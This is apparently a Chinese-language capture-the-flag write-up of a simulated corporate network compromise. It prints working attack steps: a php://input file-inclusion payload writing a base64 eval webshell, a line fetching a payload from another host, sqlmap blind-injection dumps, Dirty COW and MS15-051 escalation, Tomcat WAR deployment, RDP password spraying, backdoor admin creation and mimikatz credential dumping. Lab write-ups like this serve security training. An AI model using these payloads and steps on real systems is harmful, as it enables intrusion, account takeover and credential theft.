一、外网边界渗透
题目入口:www.theyer.com
子域名信息搜集,搜集到shop.theyer.com,继续信息搜集
目录扫描
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200806212452441-1717234176.png)
端口扫描
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807000439882-356950181.png)
1.文件包含
http://shop.theyer.com/index.php?page=about.php可疑文件包含,尝试php://input伪协议执行php命令
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002359785-205599709.png)
写shell,前面目录扫描扫到upload目录,写到该目录
http://shop.theyer.com/index.php?page=php://input
<?php echo `echo PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pPz4=|base64 -d > upload/1.php` ;?>
或者
<?php copy("http://172.16.8.2/1.txt","upload/b.php");?>
菜刀连接成功,www目录发现第一个flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002701221-1531145838.png)
flag{171b4706-0064-4f38-b617-c95c191958a9}
在www.theyer.com这个站api中找到注释了的数据库连接信息
2.提权
切到root目录发现没权限,查看内核版本
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002746599-452634340.png)
尝试脏牛提权
gcc -pthread dirty.c -o dirty -lcrypt ./dirty lazy123
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002900981-1406612302.png)
直接ssh连接,查看到flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002826333-640363432.png)
3.下载apk,静态分析源码找接
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002928585-377357247.png)
后缀改成zip拿到dex的汇编文件,反汇编得源码
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002941999-320554509.png)
d2j-dex2jar.bat classes.dex
查看源代码,找到接口URL
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003045993-425059505.png)
二、内网渗透
查看主机网络信息,发现双网卡
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003113141-1847958637.png)
上传reGeorg,配置代理进行扫描,探测主机和端口信息,扫到如下主机
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003125880-755736050.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003138333-268896741.png)
3.js接口信息泄漏SQL注入
192.168.6.17开放80端口,常规走80渗透
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003151100-38737322.png)
目录扫描
python3 dirsearch.py -u http://192.168.6.17/ -e * --delay 0.1
查看源码,发现可疑js函数
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003258369-360904388.png)
在js/main.js中找到泄漏接口
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003307359-1684496683.png)
访问http://192.168.6.17/message.php?id=1
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003322699-1966785259.png)
这个系统维护就是首页的系统维护,尝试SQL注入,是数值型
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003400710-1866947539.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003406765-655628791.png)
且是无回显盲注
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003415222-1904690162.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003424605-266380100.png)
sqlmap试试,通过--technique指定注入类型,--time-sec 指定延迟时间
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T --dbs
注入出两个数据库
[*] information_schema
[*] my_oa
注入表名
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T -D my_oa --tables
直接dump出flag表
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T -D my_oa -T flag --dump
得到flag
flag{9597b462fe22}
继续注入admin表,得到密码
md5解密29acd667cdbee1116d365727ca6821d3
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003652039-33996355.png)
拿到密码admin/37s984pass,之前目录扫描扫到admin目录,登录后台,发现个人信息处可以上传图片,没有任何过滤直接getshell
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003705030-1873264020.png)
http://192.168.6.17/upload/images/20200806121306.php
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003719256-461256841.png)
getshell
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003759424-375735662.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003804912-2105762256.png)
flag{3d9a2e33-0f0a-41de-ae9f-fa138abc0f70}
4.邮件服务器账户密码配置远程连接泄漏
在源码的配置文件中拿到远程连接邮件服务器的信息
192.168.6.16的STMP服务器连接用户名和密码zhangming@test.com/fgpass2814
本地数据库用户名密码myoa/myoa123123
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003831708-1883342430.png)
用邮箱用户名和密码登录192.168.6.16的web端
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003840799-637359209.png)
登录进去
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003849638-1219898245.png)
经过抓包、测试,看到cookie字段的id=1很可疑,尝试注入
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003856954-1206802443.png)
给id=1位置设置*,没成功
5.Tomcat弱口令部署war包
192.168.6.16:8080
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003917636-1172241940.png)
tomcat/tomcat近后台
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003927353-666264781.png)
war包地址:http://192.168.6.16:8080/test/index.jsp
/var/www目录找到第一个flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003945943-1510462232.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003954528-748612412.png)
flag{3c6ea172-7c27-438f-b440-e71f99a59b37}
root目录下发现第二个flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004019298-1037809357.png)
flag{02541512-d87c-4d13-bae8-4a9ad0ce2780}
/var/log/apache2/access_log查看日志,发现192.168.6.200这台主机的访问记录
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004034140-1188691935.png)
在/var/www/html/找到80端口的服务,在inc目录找到数据库配置文件
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004040339-1987796081.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004054199-518668861.png)
3306端口没有对外开放,尝试冰蝎自带的数据库连接功能发现连不上,尝试蚁剑的,注意上传webshell默认没执行权限,需要chmod加权限
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004111264-921463135.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004119378-2062729175.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004124615-716675413.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004132352-1919567709.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004138764-103086625.png)
连接成功拿到admin的密码22f2e5ec0bf4b85554c755993e2ba67f,解密得admin/2_333admin
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004203779-104496201.png)
6.3389撞密码提权
把之前搜集的所有密码合成字典
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004221833-393110087.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004227198-69712226.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004233535-1049887989.png)
爆破可登录端口,192.168.6.200远程桌面登录成功
192.168.6.200----RDP----3389----admin----2_333admin
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004245202-101148112.png)
远程桌面连接,在记事本历史记录发现flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004256979-1522696995.png)
直接查看发现权限不够,需要提权
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004306215-1933257560.png)
systeminfo查看主机信息,根据补丁确定可以使用ms15-051进行提权
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004317784-26314819.png)
cmd查找flag:
dir c:\ /s /b |find "flag"
Windows增加用户:
net user test test /add
赋予管理员权限:
net localgroup administrators test /add
test用户远程桌面登录,读到flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004502034-352343274.png)
flag{13b69f33-f205-436b-8c41-ccda0dff66e0}
7.mimiktz读密码登录域控
privilege::debug
sekurlsa::logonPasswords
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004542429-1855470241.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004551784-96583472.png)
发现主机存在域环境,信息搜集找域名,域名为myad.com
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004618481-181875025.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004625616-850698987.png)
ping myad.com找到域控的地址为10.1.1.10
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004639634-1260597201.png)
尝试使用读出来的administrator/ppx()0778登录域控,成功
访问\\10.1.1.10\c$,在根目录发现flag
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004650669-1699483554.png)
flag{a7b92c63-9381-4ece-8f1e-a9f6107c2170}